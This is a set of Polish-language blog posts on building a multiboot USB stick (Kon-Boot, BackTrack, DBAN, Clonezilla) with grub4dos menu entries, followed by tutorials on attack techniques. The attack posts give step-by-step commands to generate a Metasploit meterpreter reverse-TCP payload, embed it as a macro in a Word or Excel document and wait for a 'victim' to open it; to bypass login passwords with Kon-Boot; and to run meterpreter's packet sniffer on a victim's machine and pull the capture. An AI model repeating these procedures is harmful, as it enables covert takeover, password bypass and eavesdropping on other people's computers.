Informatyka

Celem tego artykułu jest opisane stworzenia pendriva z którego będziemy w stanie uruchomić programy takie jak:

• kon boot
• backtrack 4
• darik’s Boot And Nuke
• hiren boot cd

itp.

Tak więc do dzieła!

Czego potrzebujemy?

• 7zip (lub innego programu pozwalającego wyciągnąć pliki z obrazów iso)
• grub4dos i grub install (są dostępne na tej samej stronie)
• PE2USB (u mnie zadziałała wersja 3.0.0.7)
• obrazy narzędzi które chcemy umieścić na płycie (kon-boot,

Zaczynamy – krok 1

Uruchamiamy PE2USB. Wybieramy opcje tak jak widać na zrzucie ekranu poniżej.

Pe2USB

Na pendrivach powyżej 4gb może pojawić się błąd. Nie zwracajcie na niego uwagi – jedyna rzecz którą trzeba dodatkowo wykonać jest sformatowanie pendriva używając FAT32 na przykład poprzez narzędzie zarządzania dyskami w systemach Windows.

Instalujemy bootloadera- krok 2

Najpierw musimy sprawdzić jaki numer dysku ma nasz pendrive. Możemy to zobaczyć w narzędziu zarządzania dyskami windows.

Narzędzie zarządzania dyskami Windows

Jak widać pendrive opisany jest jako „dysk 1″. Uzbrojeni w tą informację przechodzimy dalej.

Nadszedł czas na instalację gruba. Najpierw uruchamiamy plik z grub install – grubinst_gui.exe.

Wybieramy dysk (w moim wypadku to co sprawdziliśmy przed chwilą – hd1. I na tym koniec – nic więcej nie zmieniamy w ustawieniach.

Grub Boot loader

UWAGA jeżeli zaznaczycie zły dysk (np. dysk gdzie zainstalowany jest Windows) Wasz system się już nie uruchomi.

Teraz ze zgranego pliku grub4dos wyciągamy plik grldr i umieszczamy go w głównym katalogu na pendrivie.

Plik menu.lst czyli co chcemy uruchamiać – krok 3

Teraz pozostaje nam tylko stworzyć plik menu.lst w katalogu głównym pendriva.

Przykładowo aby uruchomić kon-boota należy w pliku umieścić taki oto tekst:

timeout 120
title Kon-Boot
map –mem /multiboot/FD0-konboot-v1.1-2in1.img (fd0)
map –hook
chainloader (fd0)+1
map (hd1) (hd0)
map –hook
rootnoverify (fd0)

Następnie tworzymy katalog multiboot na pendrivie gdzie umieszczamy plik FD0-konboot-v1.1-2in1.img wypakowany ze ściągniętej wersji floppy image kon-boota.

W tym momencie uruchomienie komputera z pendriva powinno zaowocować pojawieniem się menu w którym możemy wybrać  program kon-boot.

Aby dodać większą ilość programów do menu uruchamiania należy „wyciągnąć” pliki z interesujących nas obrazów i odpowiednio dopisać informacje do pliku menu.lst. Niestety każdy program może mieć różne wymagania co do uruchamiania więc poniżej zamieszczam przykładową zawartość mojego pliku menu.lst dla programów:

• BackTrakck4
• Clonezilla
• dban
• gparted

Powodzenia!

title Start Hiren’s BootCD
find –set-root /HBCD/boot.gz
map –mem /HBCD/boot.gz (fd0)
map –hook
chainloader (fd0)+1
rootnoverify (fd0)
map –floppies=1
boot

title DBAN
kernel /multiboot/dban/memdisk
initrd /multiboot/dban/dban.img

title Gparted 0.4.5-2
root (hd0,0)
kernel /multiboot/gparted/live/vmlinuz1 live-media-path=/multiboot/gparted/live bootfrom=/dev/sd boot=live union=aufs noswap noprompt vga=789 ip=frommedia
initrd /multiboot/gparted/live/initrd1.img

title Clonezilla
root (hd0,0)
kernel /multiboot/clonezilla/live/vmlinuz1 boot=live union=aufs vga=789 ip=frommedia live-media-path=/multiboot/clonezilla/live bootfrom=/dev/hda toram=filesystem.squashfs noprompt ocs_live_run=”ocs-live-general” ocs_live_extra_param=”" ocs_live_keymap=”" ocs_live_batch=”no” ocs_lang=”"
initrd /multiboot/clonezilla/live/initrd1.img
boot

title BackTrack 4
kernel /multiboot/bt4/boot/vmlinuz BOOT=casper boot=casper nopersistent rw quiet vga=0×317
initrd /multiboot/bt4/boot/initrd.gz

Tym razem chciałbym rozpisać się lekko na temat użycia platformy Metasploit do zdobywania kontroli nad komputerami poprzez popularne dokumenty word/excel.

Jest jedno ograniczenie – nasz cel musi uruchomić spreparowany odpowiednio przez nas dokument z włączoną obsługą makr!

Skoro już wiemy o ograniczeniu to do dzieła … Zakładam, że:

• macie zainstalowaną najnowszą wersję Metasploit
• macie zainstalowanego Ruby (http://rubyinstaller.rubyforge.org/wiki/wiki.pl)
• korzystacie z systemu Windows (wbrew pozorom pod Windows jest trudniej;)

Tworzenie pliku skryptu Visual Basic

Cała koncepcja tworzenia zarażonego dokumentu opiera się na umieszczeniu w nim odpowiedniego kodu. W naszym wypadku będzie to meterpreter (w skrócie – program który pozwala nam później na komunikację z zarażonym komputerem).

ruby msfpayload windows/meterpreter/reverse_tcp LHOST=XXXX LPORT=8888 V > macro.bas

Polecenie to wywołujemy w katalogu gdzie siedzi msf32 (np. pod Vistą może to być c:\users\nazwa_naszego_profilu\AppData\Local\msf32.

A teraz przeanalizujmy je po kolei:

• msfpayload windows/meterpreter/reverse_tcp – w tej części mówimy skryptowi msfpayload „słuchaj, użyj meterpretera, który połączy się z twoim komputerem po uruchomieniu na komputerze ofiary”
• LHOST to adres routowalny (czyli zewnętrzny) na którym będziemy nasłuchiwać połączenia od komputera ofiary, LPORT to port który musimy mieć otwarty i gotowy do akcji.
• > macro.vba – plik wynikowy

No i już mamy 1/3 roboty za nami

Dołączanie skryptu do dokumentu Office

Ogólnie ten etap sprowadza się do uruchomienia worda/excela, dotarcia do edytora Visual Basic  i dodania skryptu który stworzyliśmy poprzez file->import file.

Za nami już ponad połowa drogi ….

Uruchomienie programu czekającego na połączenie

Już stworzyliśmy dokument, który połączy się z naszym komputerem po uruchomieniu. Musimy rozwiązać ostatni problem, czyli jak odebrać to połączenie? Ktoś dzwoni a nie mamy jeszcze uruchomionego telefonu … Teraz to zmienimy.

Wystarczy uruchomić Metasploit GUI (odpowiednie skróty powinny się zrobić w start menu po instalacji).  Wybieramy z górnego menu window->console (lub skrót klawiszowy ctrl+o).

Teraz uruchamiamy nasz telefon.Do tego użyjemy kilku poleceń które wpisujemy po kolei:

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST XXXX

set LPORT 8888

show options (pokaże opcje – sprwadź czy wszystko gra)

exploit

I pozostaje tylko czekać aż ktoś uruchomi nasz dokument …

Czasem zdarza się, że musimy uzyskać dostęp do komputera zabezpieczonego hasłem. Oczywiście istnieje wiele aplikacji usuwających hasła (np. Active Password Changer znajdujący się na Hiren Boot Cd – http://www.hiren.info/pages/bootcd), łamiących hasła (np. Ophcrack – http://ophcrack.sourceforge.net/) itp.

W tej chwili pojawiło się moim zdaniem najlepsze narzędzie, które może nam posłużyć w pominięciu hasła. Nie łamiemy go, nie usuwamy tylko pomijamy! To wspaniałe narzędzie nazywa się Kon-Boot. Jakby tego było mało obsługuje również pomijanie haseł w systemach Linux. Cały mechanizm bazuje na zmianie zawartości jądra systemu  – wszystko odbywa się w pamięci. Nie zostają więc zapisane żadne zmiany na dysku.

Narzędzie na pewno wspiera następujące systemy:

• Windows Server 2008 Standard SP2 (v.275)
• Windows Vista Business SP0
• Windows Vista Ultimate SP1
• Windows Vista Ultimate SP0
• Windows Server 2003 Enterprise
• Windows XP
• Windows XP SP1
• Windows XP SP2
• Windows XP SP3
• Windows 7
• Gentoo 2.6.24-gentoo-r5
• Ubuntu 2.6.24.3-debug
• Debian 2.6.18-6-6861
• Fedora 2.6.25.9-76.fc9.i6862

Oczywiście lista może być dużo dłuższa – po prostu wyżej wymienione zostały przetestowane.

Teraz kilka słów o tym jak z niego skorzystać.

Ściągnij – wypal

Na stronie Kon-Boot znajdziecie obrazy ISO do wypalenia na płycie (lub nagrania na dyskietce … jak kto woli). Po wypaleniu nie przejmujcie się, że płyta wygląda na pustą. Jest to efektem wykorzystania trybu tzw. emulacji stacji dyskietek (Floppy Emulation mode). Jeżeli wolicie mieć program na bootowalnym pendrivie zajrzyjcie tutaj: kon-boot i inne na usb.

Korzystaj

Teraz pozostaje już tylko uruchomić komputer z wykorzystaniem wypalonej płytki. W przypadku systemów Windows wszystko powinno zadziałać automatycznie – zobaczycie tylko kilka kiepskich grafik podobnych do tej:

Po chwili uruchomi się system bez proszenia o hasło. Ot cała filozofia. W przypadku systemów Linux jest jedna zmiana – należy zalogować się jako użytkownik kon-usr.

Jeżeli ktoś jeszcze nie zna platformy Metasploit zapraszam do artykułu na wikipedii http://en.wikipedia.org/wiki/Metasploit_Project.

W skrócie jest to platforma przeznaczona głównie do przeprowadzania testów penetracyjnych sieci. Zawiera ogromną bibliotekę exploitów i różnego rodzaju innych przydatnych narzędzi.

Ostatnio dodano nową funkcjonalność (jak na razie tylko do wersji developerskiej) polegającą na możliwości użycia sniffera. Rozszerzenie to działa w ramach meterpretera i daje zupełnie nowe możliwości dla specjalistów przeprowadzających testy penetracyjne. Aby skorzystać z rozszerzenia należy najpierw dokonać updatu Metasploita. Następnie na komputerze z uruchomionym meterpreterem używamy komend:

use sniffer (włączenie modułu do sniffowania)

sniffer_interfaces (pokazuje dostępne interfejsy sieciowe)

sniffer_start numer_interfejsu wielkość_bufora_zapisu (w tym miejscu już uruchamiamy sniffera… polecenie może wyglądać np. tak sniffer_start 1 25000)

W trakcie sniffowania możemy używać komendy „sniffer_stats 1″ (gdzie 1 to wybrany przeze mnie interfejs). Pokaże nam to statystyki związane np. z ilością pakietów które zostały zapisane.

Ostatnim krokiem jest skopiowanie pliku pcap na nasz komputer – komenda:

sniffer_dump 1 /capture.pcap

A na koniec warto wyłączyć sniffera na komputerze ofiary:

sniffer_stop 1

I to by było na tyle.